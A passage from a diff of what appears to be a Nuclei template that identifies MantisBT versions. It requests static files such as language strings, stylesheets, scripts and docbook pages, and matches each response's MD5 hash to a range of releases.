2.21.3 + dsl: + - "(\"93c59f9f0ac3edb792a4ec260384f93f\" == md5(body))" + - type: dsl + name: 1.3.3 - 1.3.20 + dsl: + - "(\"682de029cbce120a2ebc51d6b120dfb1\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.2 + dsl: + - 
"(\"64a6294acb6e29f03c36b36ae7383ed0\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.23.1 + dsl: + - "(\"e0fed3bbeba6001fbe0f76b8042e3ab9\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"23d9a60748432647834950991be717a0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Events_Reference_Output.xml" + + matchers: + - type: dsl + name: 2.0.0 - 2.20.1 + dsl: + - "(\"f5ecc5d11cbbf520b3e4223816b3a1ee\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"f1531362f17786a8fae8e5d44e8b7dd8\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"12e022147004a0c33bb36d3be7ec7ac9\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.23.1 + dsl: + - "(\"18cde9b4b10109ce9f25cc54af7d1c7b\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"32a71421fcf28788e35878376f1da1f9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_zazaki.txt" + + matchers: + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"0faa8557c38cf0224c12533bd78fb654\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"6b63f88efbd2d8f5faa1cad43023f754\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_afrikaans.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.7.1 + dsl: + - "(\"13599ef0e44b6a236aad020665f01c1c\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"6fa122065eeaa7e0544331cf2b5f73de\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"d62f46a7e762cbbc42925483a9f37e2f\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"682273c4fed4e3c765a86ec7cfe54cac\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"9c47675a9ef2ece2d6424f91dfb855ca\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"e2108a79492cd2a8067a4c7ba658f0d7\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"3bbceecb26e4878d81c32d59f2ea356c\" == md5(body))" + - type: 
dsl + name: 1.2.15 - 1.2.16 + dsl: + - "(\"eb03c428fcaa070bfc6e423198411e55\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"5fe0ccede0c06b94e4c1a18d0bb2f638\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"ca6e0c178ec16b7f44daef3b47f4a71a\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"c78d430f96b31485e671d87bc45de19b\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.15.1 + dsl: + - "(\"578b4cbd487132e683217d6b2ad90f19\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"9d4b3287550e20f07298a34ae8d20ae8\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"c690111ce44ce81333a757bd8a3a85f5\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"060623b456c6cd8da7d9801cbbe01a94\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/default.css" + + matchers: + - type: dsl + name: 2.1.0 - 2.6.0 + dsl: + - "(\"40e80256589f10ff85fc4d6d2c7057ac\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"6263ab7767d862b607b681b046e258e3\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.20 + dsl: + - "(\"c6286024c6bac2a42f378735e22fa5dc\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"456ac3fdffaaa9763f41f9eb196c8dc0\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.20 + dsl: + - "(\"2e8a20b72e96469fa8ca7d8c6fcb942d\" == md5(body))" + - type: dsl + name: 1.2.4 - 1.2.8 + dsl: + - "(\"ff7ffbca824e59104861bf01b114acf5\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.3 + dsl: + - "(\"61f431d3e70d189eed4873957d0b6e8e\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"5cd93ac8bf8050829d7820ad5110f8a0\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"c354ad3077a466ea8f31db696a8809de\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.10.1 + dsl: + - "(\"6770dcc01572e26a45f7e7e7d4638445\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.16.1 + dsl: + - "(\"5db0b0071d9519cb3ff9e0a4ea26d8c9\" == 
md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"e759620c3576b28bb8d6684c589adf86\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"5863829f5d7132947649aeb19ca8a178\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"92662c4846d16e85b73a931a8e59bd0e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/logging.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.6.0 + dsl: + - "(\"55e330c562f4f26041796c7355d113d8\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.10.1 + dsl: + - "(\"5a609d9245505fa633ed42154d1d4ce3\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.23.1 + dsl: + - "(\"c7578647f1446154e0bc49a9ed488950\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"a97f268775bb49c5e7058ea5bf892d0c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/api/rest/swagger.json" + + matchers: + - type: dsl + name: 2.3.0 - 2.23.1 + dsl: + - "(\"265858681431f502ee5c2934919676cc\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"ea9bf2e216211e28926916ab06ad48ee\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Configuration.xml" + + matchers: + - type: dsl + name: 2.3.0 - 2.23.1 + dsl: + - "(\"2bbf1c5f911707695a5de293cb6a9e57\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.2.4 + dsl: + - "(\"fac27ba3fdc583733e68d48da2887910\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"37878dc0cb09f6b0e3898fce625e7c8e\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"855df66cd68b2785ef03e0016bdc05c4\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"93d6b0ee42bf9147c319e4458382a546\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/duedate.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.23.1 + dsl: + - "(\"913a6fee919408a7bb57317ae11a10ba\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - 
"(\"6fa96f9d2be88abb9163bd8d620a3e6c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/auth.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.20.1 + dsl: + - "(\"06cf270582f43790caf31b25f69ae024\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.23.1 + dsl: + - "(\"ff99f137a1f5b325805eca88df9a504d\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"cabe500502fef31d627ef789eb5de8fd\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_persian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.21.3 + dsl: + - "(\"fcbf98c8267756c91b3bc45baba6bfa8\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"c5f695f59150e79374818e3de06cbcdb\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"658fe73f1545f4b99ebc21716f6de491\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"9ebe86925add4dc52e87099e08cfa5fc\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_zazaki.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.14.0 + dsl: + - "(\"7bc4b7761e53abeb83979d7ea51685cf\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.18.1 + dsl: + - "(\"659ad959229ea58640f6b17962dd01c9\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"a40839d9fc5039b0b8d45120691d5585\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"dae2c2c101fade7b30a8ef2e4040ef19\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"55bad46878536b7b4d63820809e8f465\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"74574a16febbb1b6583d5d93e4215d2b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"068802ca4bea742f97ee8fce5880647c\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"86348e2f074590b8d12c2177073f78a4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_french.txt" + + matchers: + - type: dsl + name: 2.6.0 - 
2.19.1 + dsl: + - "(\"30502c4a3c906a4a60568ebfbeea1794\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - "(\"253fbb67bb9771ec13f0bc730ba44c43\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"950b71af1e2a6e2aa67b2dc576a36d87\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"fc4c38b2eca12f29c8183b671ca899b2\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"58e261f2e972aa7e01f43d6c57fbd104\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"1cd24a892556f7426b72faadecfea1d2\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"2c7a4dc0e0c3dfa51d548ab0c633e5a8\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"08b2ee9e015dd114de51a9af3c23ec84\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"632b3b35e3ff738607b066b38155fe0c\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"31316011abd00e3abd7bb21ea88cf738\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"aaad4f5d9ffe9f6f90a7411e26688428\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"50e2203fb603c7a3e87066133fc85cee\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"7d7eddf0f526f03fba0d1872f9eaaf1e\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"364c8d0db32ab7d864edaf29294bc0a3\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"cde1486dbe1bb3af3914d1197b385a80\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_french.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.22.2 + dsl: + - "(\"af783a5ca3d0846b7d18d559436691d7\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"271e862967725c7f2b9e2092699a0cbf\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"55116e7cd337cd4bb54f97e04820e830\" == md5(body))" + + - method: GET + path: + - 
"{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_turkish.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.22.2 + dsl: + - "(\"eff4c2ce0331684382cd8af7496e8c47\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"3d799432747085c13c33fc81c87d90cd\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"789ccd823367987be275a66e3fe83eb4\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"23d622eea7ff0a64283baec6422a9c08\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"07a58840d1fca8d1813cd665a6066fa1\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"6f519144f23f5bf1ac9af2f40f3a2148\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"d3c6d750bcbe05cc0d10e1dbb961230e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_turkish.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.22.2 + dsl: + - "(\"6260920c9e998905fa3eca3c357729b9\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"4bd5d2ee4b71d68d1299083071d84d6e\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"8a890a847f79b747bacc0ff6c38cacb7\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"d0eb765170448f8c031db321134d70f8\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"270e03b64a3b7a1d15fcbd29d6d44543\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"5f84cca91c132b0ef586c14cb87996a2\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"3a16dd8993fb21e49d9185588e416c34\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"1e7c8dd10b3edff564a0dd3283429bef\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_french.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.8.1 + dsl: + - "(\"1e2e43529f07ed1f2e3c08369d3ff7d6\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - 
"(\"8d17dfa19af6aa59b82af76b11a432d8\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"c8acc552792a4cc7ed6d68f24e8ad8f6\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"bc2cc130a53115b043ebb0ccbe8b6b40\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"cfc4e8104a823b3fb98dca32a629f3ef\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"34e8ab9b4e51fd625f538c8be54fc9c1\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"cadcc72e53ff4abf8f6a1d55702119d7\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"06812393f39880632304416234f9999c\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"ee9d8596b5a983eb2bf96eaf79c8e7b0\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"9c9a5da1458961631347089b04637e99\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.22.2 + dsl: + - "(\"1723a68aea01468a07b30f27b382153e\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"e52bc4894e15fcc101665ba5d5ca4390\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"0ca28906aaa1fd4235a3185b80cb4530\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/bootstrap-3.4.1.min.js" + + matchers: + - type: dsl + name: 2.22.1 - 2.24.3 + dsl: + - "(\"2f34b630ffe30ba2ff2b91e3f3c322a1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/bootstrap-3.4.1.js" + + matchers: + - type: dsl + name: 2.22.1 - 2.24.3 + dsl: + - "(\"894d79839facf38d9fd672bdbe57443d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/bootstrap-3.4.1.min.css" + + matchers: + - type: dsl + name: 2.22.1 - 2.24.3 + dsl: + - "(\"14d87c40a69b42fe5abd92585f449071\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/bootstrap-3.4.1.css" + + matchers: + - type: dsl + name: 2.22.1 - 2.24.3 + dsl: + - "(\"901ab23124f862a178e724bfccf4659d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_eo.txt" + + matchers: 
+ - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"3545c62aad53dc85608953831817b3a3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_eo.txt" + + matchers: + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"a81b149320b12fdc74d1f2760655c555\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_eo.txt" + + matchers: + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"1fc982adba0892cd015d1624278b15ec\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_eo.txt" + + matchers: + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"ea2b7202d5eea8b94b4e0ca86341fd3a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/files/chartjs-plugin-colorschemes-0.4.0.min.js" + + matchers: + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"1334459753dbd8da4dfd2e833d1be02e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/files/Chart.bundle-2.8.0.min.js" + + matchers: + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"bd9843d1866f45d1406a12f7de05f9ff\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/files/Chart-2.8.0.min.js" + + matchers: + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"b235b564de9c2c1d61d7ef07fcf2b93b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/README.md" + + matchers: + - type: dsl + name: 1.3.0 - 2.21.3 + dsl: + - "(\"8742be2b99053e91c171a5620a64632c\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"2871c0c748556c088c435d33dab74622\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Troubleshooting.xml" + + matchers: + - type: dsl + name: 2.6.0 - 2.21.3 + dsl: + - "(\"b87db12769543586752d4b2001c26687\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.5.2 + dsl: + - "(\"b063103a250d7d03c3093961cfdfcb43\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.24.3 + 
dsl: + - "(\"b212c0f51c8d1f673c6250a459c56fcd\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/composer.json" + + matchers: + - type: dsl + name: 2.6.0 - 2.7.1 + dsl: + - "(\"993cbb78b59c7898476aadbfb3a35691\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"3aab133baab4deb5e5fdf3e6b0ae7675\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.4.2 + dsl: + - "(\"8bf8b6ef1320aac36cbd02fde721f4b6\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.12.0 + dsl: + - "(\"989571ee1f2dd6a4ebeb3604c812ca18\" == md5(body))" + - type: dsl + name: 2.12.1 - 2.18.1 + dsl: + - "(\"ec85953b5881a69e624706b6dac75e85\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.21.3 + dsl: + - "(\"8d4ac55900fc09d8aac6827ad24a8d40\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"d82696f29e00ea7bd5d3ee778fafd1f6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Customizing.xml" + + matchers: + - type: dsl + name: 2.3.0 - 2.12.2 + dsl: + - "(\"f42f72975886f16b1368cd61fa8c0fcd\" == md5(body))" + - type: dsl + name: 2.2.1 - 2.2.4 + dsl: + - "(\"ef89eb6929b3829c8f81b78968d0fa2d\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.2.0 + dsl: + - "(\"d154c4f3b2950c95889cd923430df101\" == md5(body))" + - type: dsl + name: 1.3.3 - 2.0.1 + dsl: + - "(\"44edc2df0f979a689b55285f38b6ac44\" == md5(body))" + - type: dsl + name: 1.3.7 - 1.3.20 + dsl: + - "(\"a23e1b906502145dde5ffc950f6a236a\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.2 + dsl: + - "(\"bb20666d9a123fe8d3da13f32db1ddcb\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.19.1 + dsl: + - "(\"61340e06e8aefb485c3ff00c197a0438\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"b902a4c1358b9ffef26cb306b9a5bc48\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"f987e2f4800396041ac2591cabb9372e\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"a275ea5141aa81835a35d0092b5bacc8\" == md5(body))" + + - method: GET + path: + - 
"{{BaseURL}}/lang/strings_sh.txt" + + matchers: + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"fe8f957689429d9f7dc124024e8c0640\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/files/chartjs-plugin-colorschemes.min.js" + + matchers: + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"15d3cd8669d148d1969ef4f509cefb98\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/files/Chart.bundle-2.7.3.min.js" + + matchers: + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"20611fc0031bee55b8cb6e99aad851b7\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/files/Chart-2.7.3.min.js" + + matchers: + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"97fc24605ac8278c6097b48ae533bf8a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/api/rest/web.config" + + matchers: + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"fa20e7a3d07825291e3d16853f88b9ca\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/bootstrap-3.4.0.min.css" + + matchers: + - type: dsl + name: 2.20.0 - 2.22.0 + dsl: + - "(\"9568d6466155669e72ed389ebb1d22f3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/dropzone-5.5.0.css" + + matchers: + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"5e018ddcbacdc772d8ad3f48b8615657\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/dropzone-5.5.0.min.css" + + matchers: + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"2f735dbf472afcd77604ecf439319f7b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/bootstrap-3.4.0.css" + + matchers: + - type: dsl + name: 2.20.0 - 2.22.0 + dsl: + - "(\"ed23e508d5ce12c5e740269f184a3288\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/bootstrap-3.4.0.min.js" + + matchers: + - type: dsl + name: 2.20.0 - 2.22.0 + dsl: + - "(\"3d8308804264c5b751f6e54734c46897\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/dropzone-5.5.0.js" + + matchers: + - type: dsl 
+ name: 2.20.0 - 2.24.3 + dsl: + - "(\"14baa29ec8f91f6c72042dcc03e5d650\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/dropzone-5.5.0.min.js" + + matchers: + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"cd479c28585ae8ebaa56189b30780e69\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/bootstrap-3.4.0.js" + + matchers: + - type: dsl + name: 2.20.0 - 2.22.0 + dsl: + - "(\"4919e6382103a157b088dd6b03478b83\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/manage_proj_edit_page.js" + + matchers: + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"5ee86a1eee5c2bbc3e88bb3909aeff3c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/list-1.5.0.js" + + matchers: + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"ab9eab3e0b79e8a762a38e2c3a5d67fe\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/list-1.5.0.min.js" + + matchers: + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"69b60bc29a0554523767949686b4d089\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_georgian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.15.1 + dsl: + - "(\"3f8b6cd21447bfa0d80b707491a46a82\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"6405d932353c2f471e1767be2dbc1251\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"cd622ff54375e6de06d7d8ad8d0a23ec\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/email.xml" + + matchers: + - type: dsl + name: 2.2.1 - 2.7.1 + dsl: + - "(\"0cfafb6fbc23cc4d49760c09a2a7a547\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.2.0 + dsl: + - "(\"46c761469f6450d9050838378a424138\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"05fcf101c1a3543d41016c77ddf51e0a\" == md5(body))" + - type: dsl + name: 1.3.7 - 1.3.20 + dsl: + - "(\"e1f08481981a14c94d8a3de0893f2206\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"d817041c6d71a76272284dbf72b274d6\" == 
md5(body))" + - type: dsl + name: 2.8.0 - 2.12.2 + dsl: + - "(\"f43868d27e4f04898bb04c2a3d54e5c4\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"60a288d023f3c5865a5813b245d704d2\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.19.1 + dsl: + - "(\"f937e4506a1ec48a9430ba2d06da516d\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"bbcff26fad31954eb5c1b7f60c47ae76\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_arabic.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.16.1 + dsl: + - "(\"2ee3e4bcc2ff0e81ce4cede70cbb9a12\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"1bd1e8ed65c1b80984595595dc93ed24\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"06dfda368f2f034a22668a883caf2349\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"6a8249690d6698f1bc0b75aa9e83c216\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"a09b735652554d6c9e0e811c081a4f16\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"b4652f0b0fab0298ee0545dbb27a61fc\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"9c67b2a8174cdafcd13f9b909263f9f6\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"498fb646bb2cb2d64538f3d56e629b40\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"849b9b31cd3b32c786fe3cc0ac64dfbb\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"716bcae0ca148190b94fa7e6000b2dde\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/files/MantisGraph.js" + + matchers: + - type: dsl + name: 2.6.0 - 2.19.1 + dsl: + - "(\"d4d8db83403027518854d4d309d46a8e\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.5.2 + dsl: + - "(\"86df6cd3b1d4aa585f8e25286e1e12b4\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - 